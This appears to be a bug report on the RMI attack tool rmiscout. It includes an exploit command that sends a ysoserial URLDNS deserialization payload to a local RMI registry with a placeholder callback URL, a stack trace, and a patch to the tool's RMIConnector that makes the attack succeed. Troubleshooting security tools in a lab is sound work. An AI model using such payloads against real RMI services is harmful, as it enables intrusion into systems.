Environment: jdk8u202

Running command:

```
exploit -s "void hello(com.PersonDTO personDTO)" -p ysoserial.payloads.URLDNS -c "http://xxx.xxx.xxx" -n myRmiService 127.0.0.1 1099
```
And I get an error:
```
java.lang.IllegalArgumentException: Can not set java.rmi.server.RemoteRef field java.rmi.server.RemoteObject.ref to com.sun.proxy.$Proxy0
    at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)
    at sun.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)
    at sun.reflect.UnsafeFieldAccessorImpl.ensureObj(UnsafeFieldAccessorImpl.java:58)
    at sun.reflect.UnsafeObjectFieldAccessorImpl.get(UnsafeObjectFieldAccessorImpl.java:36)
    at java.lang.reflect.Field.get(Field.java:393)
    at com.bishopfox.rmiscout.RMIConnector.execute(RMIConnector.java:363)
    at com.bishopfox.rmiscout.RMIConnector.exploit(RMIConnector.java:270)
    at com.bishopfox.rmiscout.RMIScout.main(RMIScout.java:325)
```
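My RMI server code is the following, very simple:

```java
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class Main {
    public static void main(String[] args) throws Exception {
        // Start an in-process registry on the default RMI port
        Registry registry = LocateRegistry.createRegistry(1099);
        // MyRmiService / MyRmiServiceImpl are the poster's own classes (not shown in the issue)
        MyRmiService myRmiService = new MyRmiServiceImpl();
        registry.bind("myRmiService", myRmiService);
    }
}
```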
I found the following code in RMIConnector.java when I debugged the error:

```java
Remote stub = pair.getValue();
......
// Bypass internal call flow for custom params
RemoteRef ref = null;
if (interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}
```
`rmiscout` always gets into the `true` block. But `stub` is a `Proxy` that implements `Remote`, so it CAN NOT get a `ref` field. That causes the error.
I think the `false` block is the better way to handle `stub`, so I changed the code in RMIConnector.java:

```java
// add a !
if (!interfaceName.endsWith("_Stub_Interface")) {
    isActivationServer = true;
    Field f = RemoteObject.class.getDeclaredField("ref");
    f.setAccessible(true);
    ref = (RemoteRef) f.get(stub);
} else {
    Field f = Proxy.class.getDeclaredField("h");
    f.setAccessible(true);
    ref = ((RemoteObjectInvocationHandler) f.get(stub)).getRef();
}
```
After rerunning rmiscout, it works! The RMI server is attacked successfully.
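
The type mismatch behind the `IllegalArgumentException` above, as an added example that is not part of the original issue or rmiscout's code: a stub produced without a pregenerated stub class is a dynamic `Proxy`, not a `RemoteObject`, so `RemoteObject.ref` cannot be read from it, while its invocation handler is a `RemoteObject` with a public `getRef()`. The names `StubRefDemo`, `Echo`, `EchoImpl` and `refOf` are hypothetical.

```java
import java.lang.reflect.Proxy;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.server.RemoteObject;
import java.rmi.server.RemoteRef;
import java.rmi.server.UnicastRemoteObject;

public class StubRefDemo {
    // Hypothetical remote interface standing in for the issue's MyRmiService.
    public interface Echo extends Remote {
        String echo(String s) throws RemoteException;
    }

    static class EchoImpl implements Echo {
        public String echo(String s) { return s; }
    }

    // Pick the access path from the stub's runtime type rather than from
    // an interface-name suffix; no reflection on private fields is needed.
    static RemoteRef refOf(Remote stub) {
        if (stub instanceof RemoteObject) {
            // Static (rmic-style) stubs extend RemoteStub, a RemoteObject.
            return ((RemoteObject) stub).getRef();
        }
        if (Proxy.isProxyClass(stub.getClass())) {
            // Dynamic stubs delegate to RemoteObjectInvocationHandler,
            // which itself extends RemoteObject.
            Object handler = Proxy.getInvocationHandler(stub);
            if (handler instanceof RemoteObject) {
                return ((RemoteObject) handler).getRef();
            }
        }
        throw new IllegalArgumentException(
                "Unsupported stub type: " + stub.getClass().getName());
    }

    public static void main(String[] args) throws Exception {
        EchoImpl impl = new EchoImpl();
        // Exporting on an anonymous port returns a dynamically generated stub.
        Remote stub = UnicastRemoteObject.exportObject(impl, 0);
        System.out.println("stub class:     " + stub.getClass().getName());
        System.out.println("is RemoteObject: " + (stub instanceof RemoteObject));
        System.out.println("is Proxy class:  " + Proxy.isProxyClass(stub.getClass()));
        System.out.println("ref:            " + refOf(stub));
        // Unexport so the JVM can exit.
        UnicastRemoteObject.unexportObject(impl, true);
    }
}
```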